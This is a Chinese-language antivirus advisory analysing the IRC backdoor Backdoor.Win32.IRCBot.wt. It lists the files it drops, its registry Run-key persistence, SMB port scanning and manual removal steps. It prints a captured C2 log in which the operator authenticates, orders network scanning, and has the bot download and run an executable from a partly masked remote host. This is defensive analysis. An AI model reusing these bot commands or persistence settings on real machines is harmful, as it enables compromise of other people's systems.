病毒信息
病毒名稱: Backdoor.Win32.IRCBot.wt中文名稱: IRC後門
病毒類型: 後門類
檔案 MD5: 36288D10F5FC1B922386CA500DF010EB
公開範圍: 完全公開
危害等級: 5
檔案長度: 569,344 位元組
感染系統: WinNT4以上系統
開發工具: Microsoft Visual C++ 6.0
命名對照: SOPHOS[W32/Rbot-GDD]
行為分析
1 、衍生下列副本與檔案:%System32%\algose32.exe
%Win$%\hp.exe 此檔案用以改變 IE 主頁設定
2 、新建註冊表鍵值:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run\Offices Monitorse
Value: String: "C:\WINDOWS\System32\algose32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\Offices Monitorse
Value: String: "C:\WINDOWS\System32\algose32.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SessionManager\
PendingFileRenameOperations
Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\
PendingFileRenameOperations
Value: Type: REG_MULTI_SZ Length: 121 (0x79) bytes
3 、修改註冊表鍵值:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
New: String: "http://www.h*ti*f*
Old: String: "about:blank"
修改下列註冊表鍵值,用以標記已感染
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM
New: String: "N"
Old: String: "Y"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
4 、創建大量掃描執行緒用以掃描存在檔案共享的目標主機。例如:
Tcp LocalHosIPt:2207 DestHostIP:445 SYN_SENT
Tcp LocalHosIPt:2207 DestHostIP:445 LISTENING
…………….
5 、IRC 服務端可回響下列命令:
Join
Nick
Kick
Part
Quit
Open [shell]: file opened:
6 、自動連線的 IRC 伺服器:
Tcp->Generic(8080) ServerIP:6*.1*9.28.1*0
7 、連線 IRC 伺服器後進行如下操作:
MODE [XP]|28094572 +n+B
JOIN #!e! dark( 頻道名稱 )
:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag
:irc.foonet.com NOTICE [XP]|28094572 :BOTMOTD File not found
:[XP]|28094572 MODE [XP]|28094572 :+B
:[XP]|[email protected] JOIN :#!e!
:irc.foonet.com 332 [XP]|28094572 #!e! :#advscan netapi 220 6 0 -r -b -s
:irc.foonet.com 333 [XP]|28094572 #!e! x2
:irc.foonet.com 353 [XP]|28094572 @ #!e! :[XP]|28094572 @x
:irc.foonet.com 366 [XP]|28094572 #!e! :End of /NAMES list.
:irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3
:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag
:irc.foonet.com 302 [XP]|28094572 :[XP]|28094572=+feicdnye@2*2.1*1.7.2*3
:irc.foonet.com 501 [XP]|28094572 :Unknown MODE flag
:[email protected] privmsg [XP]|28094572 :#login f**keremr3
:[email protected] PRIVMSG [XP]|28094572 :#sk4ni
http://2*7.*8.1*2.1*2/~rocksont/hp.exe c:\hp.exe 1
PRIVMSG x :[uRxBot]: Password Accepted.
*/ 下載 hp.exe 到目標目錄,此檔案用以改變 IE 主頁設定 */
PRIVMSG x :[DOWNLOAD] 'http://2*7.*8.1*2.1*2/~rocksont/
hp.exe' to 'c:\hp.exe'
PRIVNSG x :[DOWNLOAD] OK ('http://2*7.*8.1*2.1*2/~rocksont/
hp.exe' to'c:\hp.exe')
PRIVMSG x :[DOWNLOAD] PROCESS CREATED ('c:\hp.exe')
:irc.foonet.com 421 [XP]|28094572 PRIVNSG :Unknown command
8 、改變後的主頁為 http://www.h*ti*f*/(2*8.9*.*3.1*1)
修改系統檔案
註: % System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。 Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的安裝路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。--------------------------------------------------------------------------------
清除方案
1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。
(1) 使用 安天木馬防線結束下列進程:
algose32.exe
(2) 恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項。
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run\Offices Monitorse
Value: String: "C:\WINDOWS\System32\algose32.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run\Offices Monitorse
Value: String: "C:\WINDOWS\System32\algose32.exe"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\
SessionManager\PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\EnableDCOM
New: String: "N"
Old: String: "Y"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\
Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa\restrictanonymous
New: DWORD: 1 (0x1)
Old: DWORD: 0 (0)
(3) 刪除病毒釋放檔案
%System32%\algose32.exe
%Win$%\hp.exe